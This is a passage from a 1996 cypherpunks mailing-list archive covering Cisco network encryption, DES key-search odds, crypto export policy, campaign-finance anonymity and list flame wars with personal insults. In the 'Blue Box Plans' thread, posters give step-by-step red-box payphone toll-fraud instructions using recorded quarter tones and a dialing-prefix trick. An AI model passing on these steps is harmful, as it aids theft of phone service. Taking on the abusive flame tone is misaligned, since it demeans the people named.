  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: billstewart@mail.att.net
Date: Tue, 22 Oct 1996 18:03:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cisco Network Encryption Services
Message-ID: <326D6F0E.7FB1@mail.att.net>
MIME-Version: 1.0
Content-Type: text/plain

Cisco has an interesting web page about encryption services
that may be attached below :-)
http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm

Starting with Release 11.2, they offer several kinds of encryption,
including single-DES for US use and 40-bit-something for export.
Key exchange is Diffie-Hellman with DSS signatures.
There's a pointer to a brief white paper at 
http://www.cisco.com/warp/public/732/Security/ncryp_wp.htm
and a press release from May 96 about 
<a href="http://www.cisco.com/warp/public/146/298.html">
"Cisco Systems to Offer Free Reference Implementation
of IETF's ISAKMP Security Framework"
</a>

Title: Cisco Network Encryption Services











Cisco Network Encryption Services

More information on Cisco IOS Software and security technologies
More information on Cisco IOS Software

   Introduction    
As growing numbers of enterprises move from a centralized information-management architecture toward one that is far more distributed and open, security becomes both increasingly important and vastly more difficult to achieve. Because no single approac
h to security is sufficient, the Cisco Internetwork Operating System (Cisco IOSTM) software security architecture provides numerous security services and capabilities, including:

Access management, which pertains to authentication and authorization services for telecommuting 


Network management


Route authentication


Firewalls, which restrict specified types of packets from entering and crossing an organization's network



As an additional element of this architecture, the Cisco IOS software also provides encryption services to ensure data privacy during transmission. This paper addresses Cisco's new encryption offerings. Specifically, it explains the particular strength
s of the network-level encryption available from Cisco, comparing and contrasting it with alternative encryption methods. It also details the networking environments that can make best use of such encryption, a broad range that includes WANs, LANs, and pu
blic switching services such as the Internet. 

 Figure 1.  :    Security Policy Supported by the Cisco IOS Security Architecture    



   Encryption Methods    
Encryption using an algorithm and a key to transform intelligible information into an unintelligible state for purposes of security can occur at three levels: application, link, and network.

Application-Level Encryption
Encryption that occurs at this level requires that the specific application used either innately supports such functionality or, more commonly, is modified to incorporate it. At application level, encryption functions on an "end-to-end" basis; that is,
 information is encrypted as it is entered into an individual workstation and decrypted as it is received at another workstation. However, this setup means that the success of application-level encryption is tied to three factors:

The availability of appropriate applications that support encryption 


The ability to trust users to communicate all information through such applications 


The compatibility of encryption software of all hosts 



For these reasons, application-level encryption should be used in conjunction with additional security approaches that involve encryption during the process of information transmission.

Link-Level Encryption 
This type of encryption provides a high level of security by encrypting all the traffic at a given link, including the network layer header, with address and protocol. Link-level encryption prevents unauthorized users from obtaining information about t
he corporate network structure or specific data contained within particular transmissions. Link-level encryption is protocol- independent, but to accommodate link-layer variations, it must be both media- and interface-specific. For this reason, it works w
ell in small, point-to-point network environments and in some bridging environments. However, because encryption and decryption must occur at each link, its utility is extremely dependent on network topology. For larger, more complex network systems, link
-level encryption increases latency that degrades performance, and it is both costly and difficult to deploy. In addition, given the increasing use of Virtual Private Networks (VPNs), link-level encryption is simply unusable with public switched services 
such as the Internet.

Network-Level Encryption 
Encryption at the network level is performed in conjunction with specific protocols rather than specific media, enabling a high degree of flexibility, while providing high performance. Network-level encryption operates on a flow-by-flow basis, encrypti
ng payload traffic between specified user/application pairs or subnets while leaving network-layer headers intact. In other words, encryption support is required only at the boundaries of subnets, not at any intermediary networking devices. Because networ
k-level encryption is media- and topology-independent and works well across all interfaces, it is the optimal approach for large, complex networks (especially those that involve routers) and, in general, for networks based on any WAN media, including the 
Internet. It is because of these advantages that Cisco chose to incorporate network-level encryption functionality into its Cisco IOS operating system.

 Figure 2.  :    Encryption Alternatives     


Cisco encryption services involve four basic components: 

Device certification and authentication 


Key exchange


Encryption policy and connection setup 


Encryption methods




   Cisco IOS Encryption Services    

Device Certification and Authentication 
The Cisco IOS software uses the Digital Signature Standard (DSS) established in 1994 by the National Institute of Standards and Technologies for device authentication during public key exchange. (Without device authentication, any third party could eff
ectively pretend to be the recipient to both communicating devices and read, modify, and delete data.) The Cisco authentication scheme enables users to determine the pairs of networks that they wish to have encrypted. Routers establish secure connections 
with destination routers that allow them to authenticate each other without benefit of encrypted data or predefined secret keys. A certificate hierarchy provides a guarantee for the authenticity of the routers' credentials, including public key. 

Key Exchange 
The Cisco IOS software uses the Diffie-Hellman process for the exchange of public keys. Diffie-Hellman is an algorithm allowing two parties to exchange nonsecret information, while independently calculating a third number to be used as a session key to
 encrypt data that passes between them. This feature allows the routers to change their session key as often as necessary without having to send that key across the network in any form. 


Encryption Policy 
Cisco software now enables users to set up subnet-to-subnet encryption services and per-user/application based on IP packets. When a packet is sent through a secured connection, it is encrypted as it leaves the source subnet and decrypted as it arrives
 at the destination subnet. By selectively encrypting traffic from specific users and applications, network encryption reduces the cost and increases the flexibility of ensuring secure data transmission. To meet the needs of organizations whose internetwo
rks include sections running non-IP protocols, such as Novell IPX or AppleTalk, the Cisco IOS software supports generic routing encapsulation (GRE). GRE allows the encapsulation of the non-IP protocol as part of the network traffic and, as such, it is enc
rypted, and a new header is appended. This approach effectively enables the non-IP protocol to "tunnel" rapidly through the IP portion of the network. When it reaches its destination, the traffic is first decrypted and then deencapsulated. This technique 
can also be used to hide network address and application information as encrypted payloads are transmitted across a network. Cisco plans to support other protocols in later releases of the Cisco IOS software.

Encryption Methods
Cisco supports the Data Encryption Standard (DES), with two key lengths. Standard DES is based on a 56-bit encryption key and is subject to U.S. State Department restrictions, as well as import/export restrictions of various countries. The second optio
n supported by Cisco encryption services is based on a 40-bit key and is fully exportable.

 Figure 3.  :    Cisco IOS Encryption    



   Implementation    
Cisco offers network-level encryption solutions implemented through both software and hardware.

Software-Based Encryption Solutions
Starting with the Cisco IOS software Version 11.2, Cisco offers users network-level encryption using DES. This feature is implemented as an extension to access lists. Cisco's software-based encryption services are available for networks running over an
y media that support IP and Cisco 2500, 4XXX, 7000, and 7500 routers. 

Organizations that use the Cisco 7500 series or Cisco 7000 with Route/Switch Processor (RSP) series have two options: performing software-based encryption on the main RSP or offloading such encryption functions to one of the router's Versatile Interfac
e Processors (VIPs) for higher performance. 

Hardware-Based Encryption Tools
To augment the encryption support available through the Cisco IOS software, Cisco also offers a hardware accelerator for the Cisco VIP: the Encryption Port Adapter (EPA). This card, which greatly enhances the performance of Cisco's software-based encry
ption services, has been jointly developed with Cylink, the company that pioneered the development of public key management systems more than a decade ago. 
The Cisco EPA card also meets the federal information processing standards and includes numerous security features. For example, it offers a tamper shield designed to prevent probing. In addition, the EPA has an extraction detection system that require
s reauthentication if the card is removed from one router and inserted into another.

   Applications    
The following scenarios illustrate the networking applications that can benefit most from the network-level encryption now offered by the Cisco IOS software.

Wide-Area Private Networking
Organizations such as banks face difficulties inherent in securing information traffic between many sites, compounded by the challenges posed by their use of varied media. Link-level encryption can be difficult and costly, since its media-specific natu
re would require the purchase of numerous different encryption products. In contrast, Cisco's network-level encryption, with its media-independence, provides a single, less expensive security option. Organizations can run the Cisco IOS network encryption 
feature in remote Cisco 2500/4XXX systems and use the Cisco 7500 and EPA to provide the higher performance required at the central site. 

LAN or Campus Networks
Today's enterprises generally have extremely complex network environments, with multiple servers containing sensitive information dispersed throughout the network. To further complicate matters, the network often includes multiple media types, such as 
Ethernet, Fiber Distributed Data Interface (FDDI), and Token Ring. In an environment with multiple paths between any two end stations, link-level encryption is unsuitable, if not impossible. Cisco's network-level encryption can offer the flexible, end-to-
end approach required, allowing enterprises to choose the specific traffic they wish to encrypt within an enterprise network LAN.

Public Networks/Internet
Organizations that need to make a variety of information (data on stocking, ordering, and pricing, for example) available globally to their own remote sites and partners are increasingly turning to public services such as the Internet to create VPNs. F
or these organizations, link-level encryption is simply not an option, because it cannot be operated across public switched networks. Since Cisco's network-level encryption can run over any media that support IP, it offers an ideal security solution for V
PNs, allowing data security across a public network.


   Conclusion    
Security policies are becoming more important as enterprises make increasing use of distributed networking models. Today, to secure their network information, most enterprises must implement a broad range of approaches, including access management, fir
ewalls, and host security. The Cisco IOS software security architecture addresses each of these areas. In addition, it now encompasses powerful new encryption capabilities at the network level that offer major enhancements over available link-level soluti
ons and can significantly augment the security provided by any application-level encryption already in use.

Posted: Mon May 6 14:03:00 PDT 1996




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 22 Oct 1996 15:03:53 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Timmy May is a jerk
In-Reply-To: <7H87VD38w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961022175750.175B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Timmy May continues to post nonsensical praises in his name using
> an anonymous remailer....

How do you know that it's him?
 
> Timmy May is an ignorant coward. He's got nothing better to do,

Lesse now, you must be projecting. After all, you were invited to speak 
in San Fran, you declined backing out as only a coward would, not 
outright "No" but rather "When I have the time" and refused to plan this 
ahead, even months ahead.  Yet, you seem to have plenty of time to flame 
here, so you really have lots of free time - to flame and be cowardly.  
And your ignorance is legendary around here.  You ignore netiquette and 
flame and cause flame wars and spam.

> so he starts up flame wars on this mailing list. He can't contribute
> anything crypto-relevant because he knows nothing about cryptography.

So what do you contribute other than copyrighted news postings and huge 
flames, and do so without the author's permission? Or do you have their 
written permission?

> This is a lie. Anyone who's been subscribed to this mailing list for
> a while knows that Timmy May posts to most personal attacks (inlcuiding
> attacks on his many enemies' religion and ethnicity), lies, fabricated
> quotes, flame bait, and overall noise.

I have been on this list since 1992 and can attest to the fact that the 
above paragraph which you have written is false.  I have seen more personal 
attacks, flames, racial prejudice, and lies from you than from anyone 
else on here.  I guess you are of the belief that if you lie in every 
message about someone violently enough, eventually someone will believe 
your bullshit.

That someone isn't me Vulis.  An asshole is an assole, and you sir sure 
fart like one.  Get off this list.  Take your shit elsewhere, we don't 
want you here.  Be gone!

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@sundernet.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
========================http://www.sundernet.com=============================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 22 Oct 1996 15:34:01 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <19961022.120700.9990.0.h2@juno.com>
Message-ID: <Pine.SUN.3.94.961022182320.22859B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Michael B Amoruso wrote:

> Thanks for the tip!  My friend is good with electronics and he is
> building a red box using all chips and shit.  He found out some equation
> to use so when a capacitor fills up and then discharges to a resistor,
> using a certain equation u can generate frequencys.  I also found out
> that you can do the same with QBasic.  I wish there was a way to blue
> box, but it seems that there's not.  Thanks for everything.

cypherpunks is not 2600.  Readers and posters would do well to understand
that this list has among its readers at least one former federal
prosecutor and several active law enforcement officials.

Please take your discussion elsewhere.

> On Mon, 21 Oct 1996 16:50:42 -0700 (PDT) Perry Farrell <pneyz@armory.com>
> writes:
> >> Also, the network's signalling has changed, and the basic 
> >> Captain Crunch Whistle doesn't work many places any more -
> >> most of the signalling is digital out-of-band rather than
> >> inband audio.  Phreaking isn't impossible (or there wouldn't be 
> >> as many people chasing the Dread Pirate Mitnick), but at this point
> >> you actually need to know what you're doing to succeed at it,
> >> and merely having plans for a device you don't know well enough to
> >> emulate in code on your PC isn't going to buy you much.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eli+@gs160.sp.cs.cmu.edu
Date: Tue, 22 Oct 1996 15:37:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [DES] Criteria for Key Recovery target.
In-Reply-To: <+cmu.andrew.internet.computing.coderpunks+YmPCtHi00UfAI10Mcw@andrew.cmu.edu>
Message-ID: <199610222237.PAA04951@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Russell Holt writes:
>BTW, does anyone have references to statistical comparisons of key
>searches in "real world" settings? Eg, random starting locations
>versus random keys .. etc..

E(time) with all trial keys distinct: 
        1/N Sigma^N i = N/2 = 2^55.
E(time) for random trials:
        1/N + (N-1)/N (1 + E(time))
        so E(time) = N = 2^56.

Centralized keyspace handling is a clear lose, IMO.  The RC4-40
project had server problems; scaling up by another 2^16 would be
non-trivial.  Then there are problems with malicious searchers,
corrupt servers, flaky networks... all this for a factor of two?
(And, admittedly, the reduction in variance.)

To rain on the parade a bit, what this discussion says to me is that
most applications of DES are safe from net cracking for a few years
yet...

-- 
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 22 Oct 1996 15:43:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cyberspace Law
Message-ID: <1.5.4.32.19961022224239.006f4830@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   David Post has a comprehensive outline of the legal
   issues affecting cyberspace, many of which are addressed
   by cypherpunks, at:

      http://www.cli.org/cyberspace/index.html

   It's very much worth reading, pondering and learning
   from.

   Here are excerpts:

   -----

   Law of Cyberspace Seminar

   Fall 1996
   Prof. David G. Post (david.post@counsel.com)

   Introduction

   The emergence of the global network -- the "Internet" and
   its constituent networks -- and the associated "digital
   revolution" -- the ability to access, store, and transmit
   vast amounts of information in digital form (computer
   software, videogames, music, text, etc.) -- presents an
   array of new problems and opportunities for lawyers
   preparing to practice in the 21st Century.  It is
   becoming increasingly evident that the process of
   "mapping" existing legal concepts and tools into this new
   domain is not going to be straightforward, and that a
   number of familiar legal concepts will need to be
   rethought before they can be efficiently applied in the
   new environment.

   The goal of this course is threefold:

   First, to introduce you, by means of a series of specific
   case studies chosen to illustrate the clash between
   existing legal regimes and new technologies, to a
   reasonably comprehensive subset of the legal problems
   that will need to be addressed in this new environment;

   Second, to help you, through fairly intensive work on
   your research papers, to prepare publishable quality
   written work; and

   Third, to help you become comfortable with the
   information-retrieval and transmission capabilities of
   this new medium, both because no discussion of the "law
   of cyberspace" can be very fruitful without some basic
   understanding of the special characteristics of the new
   domain, and because lawyers will increasingly be called
   upon to demonstrate some familiarity with Internet
   navigation as businesses (including law firms)
   increasingly utilize the global network as a means of
   delivering their services.

   [Big snip of bountiful thoughts and links to information
   sites]

   Appendix 3:  Possible Paper Topics

   This list is just designed to get you started thinking
   about possible paper topics.  It is by no means
   exhaustive; feel free to choose a topic not mentioned
   below.

   Protection of employee electronic mail.

   Are new rules required regarding online sexual
   harassment?

   Trademarks and Internet domain names -- can they be
   reconciled?

   Intermediary (system operator) liability for subscribers'
   copyright or trademark infringements or other "wrongful"
   conduct.

   Does Web browsing, or the caching of World Wide Web
   pages, constitute copyright infringement?

   Analysis of electronic shrinkwraps:  Are online
   disclaimers enforceable?  What procedural steps can be
   used to enhance enforceability?

   Jurisdiction and choice of law in cyberspace.

   Dispute resolution in cyberspace.

   Should true anonymity be allowed in online contexts?  Who
   will bear the responsibilities of anonymous actions?

   Taxation in cyberspace (e.g., application of foreign
   states' sales tax laws to online transactions).

   Dataveillance.  The use of online data profiles in
   marketing research.

   Compilation copyrights for collective online activities.

   Legality of online gambling.

   "Moral rights" in cyberspace.

   Analysis of legal issues regarding programs that extract
   information from a user's hard drive and communicate back
   to a central server (Windows 95, Netscape Navigator).

   Data authentication, the use of computer-generated
   evidence and computer-generated signatures in contracts.

   Content regulation in cyberspace: Obscenity, indecency,
   and false advertising

   Licensing and professional liability (e.g. the
   application of licensing schemes and other regulatory
   provisions to professional practice of lawyers, doctors,
   or others on the net).

   Internet self-regulation: cyber-democracy, frontier
   justice, and other regulatory models in cyberspace.

   The control of online defamation.

   Product liability for on-line products.

   Clipper, encryption and decryption.

   Net commerce: Digital money and other solutions.

   Net commerce: Copyright management systems and other
   schemes for charging by the byte.

   Do we need new rules regarding enforcement of the
   antitrust laws in cyberspace?

   -----

   Thanks to David Post for this IP lift lift.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 22 Oct 1996 12:57:17 -0700 (PDT)
To: Peter M Allan <peter.allan@aeat.co.uk>
Subject: Re: Dimitri goes to California - was Re: [SERDAR ARGIC] Ray Arachelian...
In-Reply-To: <9610221250.AA15145@clare.risley.aeat.co.uk>
Message-ID: <Pine.BSI.3.95.961022195255.17319A-100000@usr07.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Peter M Allan wrote:

> > Date: Mon, 21 Oct 1996 21:08:17 -0700 (PDT)
> > From: Sandy Sandfort <sandfort@crl.com>
> 
> > So it IS intellectual dishonesty and cowardice.  I thought so.
> > Is there anyone on the list who thinks Dimitri is a man?
> 
> Not me.  Pick another speaker, poll the pledgers for
> agreement and don't ask Dimitri again.
> 
> And just when I let him out of my killfile in the
> hope I'd see him accept the challenge.
> 
	well, hey, we all get disappointed somedays.  but I was really
looking forward to roasting the KOTC  C==century.  he went back in my 
kill file along with a list of the anonymous remailers + tcmay in body.
Doesn't get 'em all, but it's a start.

	read the mit file on him --what a pain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 22 Oct 1996 19:48:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Holding Netscape's and Microsoft's Feet to the Fire
In-Reply-To: <1.5.4.32.19961018165938.006d39ec@pop.pipeline.com>
Message-ID: <v03007800ae9344e06b6a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:11 PM -0700 10/22/96, Jeff Weinstein wrote:
>John Young wrote:
>>
>>    10-17-96, BuWi:
>>
>>    "Apple, IBM, JavaSoft, Motorola, Netscape, Nortel, Novell,
>>    RSA, and Silicon Graphics Announce PICA Crypto-Alliance"
>>
>>       The PICA specification will also be designed to make the
>>       task of developing differing domestic and exportable
>>       security requirements much easier. [GAK alliance 2.]
>
>  John, I think you are misreading the intent here.  By making
>it easier to develop separate domestic and exportable
>versions of a product, we foil the government's attempt to
>force weak domestic encryption because it is too much work to
>maintain two different versions.

Thwarting the True Intent of GAK by ensuring that domestic crypto is
completely unhampered, unhindered, unlimited, and unGAKked is terribly
important. A year or so ago, when Netscape folks issued assurances that the
"relative convenience" of having one "world version" would not be the
determining factor, and that Netscape would have two versions (times the
number of platforms they support), was an incredibly positive development.

(And Bill Gates, of the Evil Microsoft, had already isssued scathing
denunciations of key escrow and mandatory crypto, so MS was already
effectively in our camp.)

So, if PICA helps this (along with the Elites Alliance, a rival type), more
power to them. I wouldn't be surprised if the Feds try to exert pressure on
them to change this purpose that Jeff W. describes. Government will realize
that industry consortia are a way to "build consensus" on getting GAK built
in to even domestic products. (The renaming of Clipper/Tessera/etc. to key
escrow and then to "key recovery" is essential to this strategy....got to
convince U.S. software companies that Mr. Policeman is Our Friend...not an
easy sell.)

But I wonder if the PICA Alliance will be allowed to pursue this "dual
strength strategy." Mightn't it be a violation of the ITARs merely to
_conspire_ to keep domestic crypto unhindered and strong?

(:-} for the :-}-impaired.)

Though this is preaching to the choir, it's imperative that Netscape,
Microsoft, and the Other Minor Players remain committed to _never_
compromising the security of _domestic_ products....Europe and Asia will
have to take of themselves, as the true battle always has and always will
be about the U.S. government's desire to surveil us and tap our
communications at will.

(Anyone who doubts this should reread the recent comments of Janet Reno,
Louis Freeh, Jamie Gorelick, and all the others talking about the need to
read the communications of criminals and suspected criminals. The real goal
is to head off crypto anarchy, as the summary by Black Unicorn made clear
just a day or two ago.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 22 Oct 1996 20:05:10 -0700 (PDT)
To: crumrig@us-state.gov
Subject: Re: GET ME OUT OF HERE - TOO!
In-Reply-To: <1.5.4.32.19961022012046.00821074@proxy.pronetc.com>
Message-ID: <Pine.SUN.3.91.961022200426.7010A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


No. I will never unsubscibe you.

Suffer, lout.

-Declan


On Mon, 21 Oct 1996 crumrig@us-state.gov wrote:

> UNSUBSCIBE



// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 22 Oct 1996 20:13:58 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
In-Reply-To: <199610220425.VAA15124@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.961022200755.7010C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


There would seem to be serious First Amendment problems with this scheme.

If you wanted to give or withhold support, you should able to say that 
you did or didn't donate money. Besides, interest groups would always be 
able to telegraph the news of the donation -- while the public remains 
in the dark. It may be better for the public to have full disclosure.

-Declan


On Mon, 21 Oct 1996, jim bell wrote:

> At 09:24 AM 10/17/96 -0800, Timothy C. May wrote:
> >
> >There are several swirling threads about the development of crypto systems
> >(e.g., "binding cryptography," "key recovery," "one-way traceable e-cash")
> >that are designed to allow law enforcement some ability to track illegal
> >transactions, catch some criminals, etc.
> 
> One of the other items on my wish-list (short of a more, uh, "permanent" 
> solution to politics) is a system to actually enforce the anonymity of 
> political donations.  What I mean is this:  As bad as a large political 
> contribution is, what's worse is that the candidate who receives it knows 
> who it is from, and how large it is, etc.  Given the recent flap over the 
> Indonesian donations to the DNC, it seems to me that it would actually clean 
> up politics if there were a mechanism to collect donations, blind them and 
> send them to the proper candidate, but hide the actual source of that money. 
>  Hide it from the candidates, not necessarily the anyone else. 

// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 22 Oct 1996 20:18:45 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Chinese internal internet
In-Reply-To: <3iN7VD36w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961022201743.7010D-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> A typical ignorant U.S. attitude towards Cuba... I received e-mail from Cuba
> over the Internet back in 1989.  They're not afraid of it.  The U.S. is.

Wrong. Both are.

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


June 20, 1996
                                         
         HAVANA (Reuter) - Cuban authorities have approved access to  
the Internet and other global information networks but will 
limit such access according to national interests, official 
media said Thursday. 
         The ruling Comunist Party newspaper Granma said regulations  
adopted earlier this month outlined the need for access to 
Internet and other world information networks, while observing 
interests such as ``defense and national security.'' 
         The policy of establishing who had access would be defined  
by Cuba's interests, giving priority to individuals and bodies 
with most relevance to the country's life and development, the 
newspaper said. 
         It did not specify who such people might be, but they are  
likely to come from approved state organizations and academic 
and research centres. 
         Information divulged from such global networks should be  
trustworthy and in line with Cuba's ``ethical principles'', 
Granma said. 
         A committee regulating the policy on global information  
networks would be drawn from ministries that will include the 
Interior Ministry, the Justice Ministry and the Armed Forces 
Ministry, Granma said. 

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 22 Oct 1996 20:38:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Stopping the buying of candidates
In-Reply-To: <199610220425.VAA15124@mail.pacifier.com>
Message-ID: <v03007801ae935361d3c8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:13 PM -0700 10/22/96, Declan McCullagh wrote:
>There would seem to be serious First Amendment problems with this scheme.
>
>If you wanted to give or withhold support, you should able to say that
>you did or didn't donate money. Besides, interest groups would always be
>able to telegraph the news of the donation -- while the public remains
>in the dark. It may be better for the public to have full disclosure.

As I see it, there are also "serious First Amendment problems" with "full
disclosure." Or with the closely-related campaign spending limits.

If we support anonymous leafletting, anonymous speech, and just about
anonymous _anything_, why should we accept that the State can compell who
spent money in support of a candidate?

Our political system is already in thrall to various special interests;
this is the nature of our overly-democratic system. So be it. Let the
highest bidder buy the government he can.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Tue, 22 Oct 1996 18:57:54 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <Pine.SCO.3.91.961021164621.18461G-100000@deepthought.armory.com>
Message-ID: <326D7ADB.5EE6@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael B Amoruso wrote:
> 
> Oh yeah I forgot one thing.  What do you mean by NPA and why cant i just
> dial like a regualr call??  And what is a DMTF dialer?
> 
> On Mon, 21 Oct 1996 16:50:42 -0700 (PDT) Perry Farrell <pneyz@armory.com>
> writes:
> >> Also, the network's signalling has changed, and the basic
> >> Captain Crunch Whistle doesn't work many places any more -
> >> most of the signalling is digital out-of-band rather than
> >> inband audio.  Phreaking isn't impossible (or there wouldn't be
> >> as many people chasing the Dread Pirate Mitnick), but at this point
> >> you actually need to know what you're doing to succeed at it,
> >> and merely having plans for a device you don't know well enough to
> >> emulate in code on your PC isn't going to buy you much.
> >
> >Very good point, phreaking's getting tricky. First of all, forget blue
> >
> >boxes, they're worthless, especially to an amateur, which you (HeLiuM)
> >
> >obviouisly are. Get a red box. Go to Radio Shack and buy a digital
> >recorder pocket memo thing. They're about ten bucks and it's alot
> >easier
> >than getting a handheld DTMF dialer (which is annoying to solder
> >because
> >RS doesn't make them very well). Get BlueBeep or something
> >(ftp.fc.net/pub/defcon/BLUEBEEP) and record some quarter tones. Go to
> >a
> >Bell payphone (CoCoTs and USWest phones do not work) and dial
> >"1+area+npa+number", like a normal call. Then play the tones. For a
> >local
> >call, dial "10288+area+npa+number", which makes AT&T think it's along
> >distance call.
> >
> >                                       pneyz (pneyz@armory.com)
> >


DEFINITIONS for budding phone phreaks:

NPA: Numbering Plan Area - known to us humans as area codes; instituted
circa 1947 for long distance dialing.

DTMF: dual-tone multi-frequency - known to humans as TouchTones(tm); 
used to dial telephones.

Advice:  Instead of getting your friend to build you a red box, get
a SoundBlaster Sound Card and get the sound file that is the
quarter tone.  Play this into a tape recorder or into a greeting card
that records sound and use at your own risk!

Also - find as many back-issues of 2600 (a print publication) and Phrack
(an on-line publication [text files]) as you possibly can.  Memorize
them and you will be on your way to becoming a phone phreak!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Tue, 22 Oct 1996 19:01:43 -0700 (PDT)
To: Michael B Amoruso <h2@juno.com>
Subject: Re: Blue Box Plans & hacker bbs's
In-Reply-To: <Pine.SCO.3.91.961021164621.18461G-100000@deepthought.armory.com>
Message-ID: <326D7BD0.5F2E@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


One more thing - if you are on the web, jump to your friendly
neighborhood search engine and look for your keywords you were
talking about:  phreak, blue box, red box, 2600, phrack, etc, many
more to choose from.

You may find some pages (a few) of interest.

B.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 22 Oct 1996 18:23:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Offshore Investing is Green
Message-ID: <3.0b19.32.19961022212034.00d7c0d0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>From a World Bank outline on setting up "Conservation Trust Funds" to fund
conservation projects.

http://www-esd.worldbank.org/html/esd/env/publicat/edp/edp1107.htm


"Offshore Asset Management

The advantages of offshore professional asset management are many; namely,
the assets can be invested in a hard currency, in a secure market, in a
secure location, and in an account which is tailored to the objectives of
